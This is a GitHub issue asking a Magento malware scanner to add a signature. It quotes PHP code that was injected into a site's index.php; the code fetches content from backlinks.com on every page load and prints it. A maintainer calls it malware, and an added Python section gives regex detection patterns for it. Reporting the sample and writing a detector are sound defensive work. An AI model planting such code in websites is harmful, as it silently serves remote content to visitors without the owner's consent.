gwillem/magento-malware-scanner

please include for scan

Closed this issue · 1 comments

The following code was injected into the index.php file:

$OpenInNewWindow = "1";

// # DO NOT MODIFY ANYTHING ELSE BELOW THIS LINE!
// ----------------------------------------------
$BLKey = "CAHP-YX3S-PWBH";

if(isset($_SERVER['SCRIPT_URI']) && strlen($_SERVER['SCRIPT_URI'])){
    $_SERVER['REQUEST_URI'] = $_SERVER['SCRIPT_URI'].((strlen($_SERVER['QUERY_STRING']))?'?'.$_SERVER['QUERY_STRING']:'');
}

if(!isset($_SERVER['REQUEST_URI']) || !strlen($_SERVER['REQUEST_URI'])){
    $_SERVER['REQUEST_URI'] = $_SERVER['SCRIPT_NAME'].((isset($_SERVER['QUERY_STRING']) && strlen($_SERVER['QUERY_STRING']))?'?'.$_SERVER['QUERY_STRING']:'');
}

$QueryString  = "LinkUrl=".urlencode(((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS']=='on')?'https://':'http://').$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
$QueryString .= "&Key=" .urlencode($BLKey);
$QueryString .= "&OpenInNewWindow=" .urlencode($OpenInNewWindow);


if(intval(get_cfg_var('allow_url_fopen')) && function_exists('readfile')) {
    @readfile("http://www.backlinks.com/engine.php?".$QueryString); 
}
elseif(intval(get_cfg_var('allow_url_fopen')) && function_exists('file')) {
    if($content = @file("http://www.backlinks.com/engine.php?".$QueryString)) 
        print @join('', $content);
}
elseif(function_exists('curl_init')) {
    $ch = curl_init ("http://www.backlinks.com/engine.php?".$QueryString);
    curl_setopt ($ch, CURLOPT_HEADER, 0);
    curl_exec ($ch);

    if(curl_error($ch))
        print "Error processing request";

    curl_close ($ch);
}
else {
    print "It appears that your web host has disabled all functions for handling remote pages and as a result the BackLinks software will not function on your web page. Please contact your web host for more information.";
}

Ping me back if any more details are needed.

Thanks, this is curious malware. Did it print anything at the time of your discovery?
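
A signature-style check for the snippet quoted in this issue, written in Python as an added example (it is not code from the issue or from magento-malware-scanner). It goes slightly beyond the quoted sample by also flagging the same remote-fetch pattern against any host; the function names, the sample strings and the placeholder key are constructed for illustration.

```python
import re

# Indicators derived from the injected snippet quoted in this issue.
INDICATORS = {
    # Remote endpoint the snippet fetches on every page load.
    "backlinks_endpoint": re.compile(r"backlinks\.com/engine\.php", re.I),
    # Account key variable that is sent as the Key parameter.
    "blkey_assignment": re.compile(r"\$BLKey\s*=\s*[\"'][A-Z0-9-]+[\"']"),
    # Generic: a fetch function called with an http(s) string literal that is
    # concatenated with a variable (the readfile / file / curl_init branches).
    "remote_fetch_concat": re.compile(
        r"@?\b(?:readfile|file|file_get_contents|curl_init)\s*\(\s*"
        r"[\"']https?://[^\"']+[\"']\s*\.\s*\$\w+", re.I),
    # The snippet assigns to REQUEST_URI before reporting the page URL.
    "request_uri_overwrite": re.compile(
        r"\$_SERVER\[\s*[\"']REQUEST_URI[\"']\s*\]\s*=(?!=)"),
}

def scan_php(source):
    """Return the sorted names of all indicators found in PHP source text."""
    return sorted(n for n, rx in INDICATORS.items() if rx.search(source))

def verdict(source):
    """Classify a file: known injection, generic remote include, or clean."""
    hits = set(scan_php(source))
    if {"backlinks_endpoint", "remote_fetch_concat"} <= hits:
        return "backlinks-injection"
    if "remote_fetch_concat" in hits:
        return "suspicious-remote-include"
    return "clean"

# Constructed sample: condensed from the issue, key replaced by a placeholder.
INFECTED = r'''<?php
$BLKey = "XXXX-XXXX-XXXX";
$_SERVER['REQUEST_URI'] = $_SERVER['SCRIPT_NAME'];
$QueryString = "LinkUrl=".urlencode($_SERVER['HTTP_HOST']);
if(function_exists('readfile')) {
    @readfile("http://www.backlinks.com/engine.php?".$QueryString);
}
'''
# Constructed sample: same technique, different host and the curl branch.
VARIANT = r'''<?php $ch = curl_init ("http://example.invalid/e.php?".$q);'''
# Constructed sample: benign code that reads REQUEST_URI and uses curl.
CLEAN = r'''<?php
$ch = curl_init("https://example.invalid/api");
if ($_SERVER['REQUEST_URI'] == '/') { echo file_get_contents(__DIR__.'/h.html'); }
'''
```

The generic `remote_fetch_concat` hit alone is only a lead for manual review, since legitimate code can also build a URL by concatenation.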